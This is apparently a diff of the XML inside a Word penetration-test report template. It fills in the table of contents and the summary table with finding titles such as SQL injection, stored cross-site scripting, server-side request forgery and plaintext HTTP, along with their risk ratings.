+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299237" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Risk Rating</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299237 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299238" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>References</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299238 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299239" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Recommendation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299239 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299240" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Finding 5 - SQL wi</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ld</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>card attack vulnerability present in the API for trainings</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299240 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299241" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299241 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299242" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Proof of Concept</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299242 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299243" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Impact</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299243 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299244" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Likelihood</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299244 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299245" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Risk Rating</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299245 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299246" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>References</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299246 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299247" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Recommendation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299247 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2157,10 +4069,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927413" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299248" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2187,7 +4103,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927413 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299248 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2207,7 +4123,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2225,10 +4141,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927414" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299249" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2255,7 +4175,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927414 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299249 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2275,7 +4195,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2312,7 +4232,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc69927387"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71299206"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Summary of Findings</w:t>
@@ -2531,7 +4451,13 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Nature of vulnerability / One line description</w:t>
+              <w:t xml:space="preserve">SQL </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>injection vulnerability present in finding user functionality</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2610,7 +4536,13 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Nature of vulnerability / One line description</w:t>
+              <w:t>Stored crossing-site scripting vulnerability present in anonymous question func</w:t>
+            </w:r>
+            <w:r>
+              <w:t>t</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ionality</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2640,7 +4572,7 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Medium</w:t>
+              <w:t>High</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2689,7 +4621,10 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Nature of vulnerability / One line description</w:t>
+              <w:t>Server-side request forgery vul</w:t>
+            </w:r>
+            <w:r>
+              <w:t>nerability present in the website validation functionality</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2717,9 +4652,22 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Low</w:t>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>M</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>edium</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2745,9 +4693,22 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Finding 4</w:t>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>F</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>inding 4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2768,7 +4729,7 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Nature of vulnerability / One line description</w:t>
+              <w:t>Sensitive information transported in plain text via HTTP</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2826,7 +4787,10 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Finding 5</w:t>
+              <w:t xml:space="preserve">Finding </w:t>
+            </w:r>
+            <w:r>
+              <w:t>5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2847,316 +4811,42 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Nature of vulnerability / One line description</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1365" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6150" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1365" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
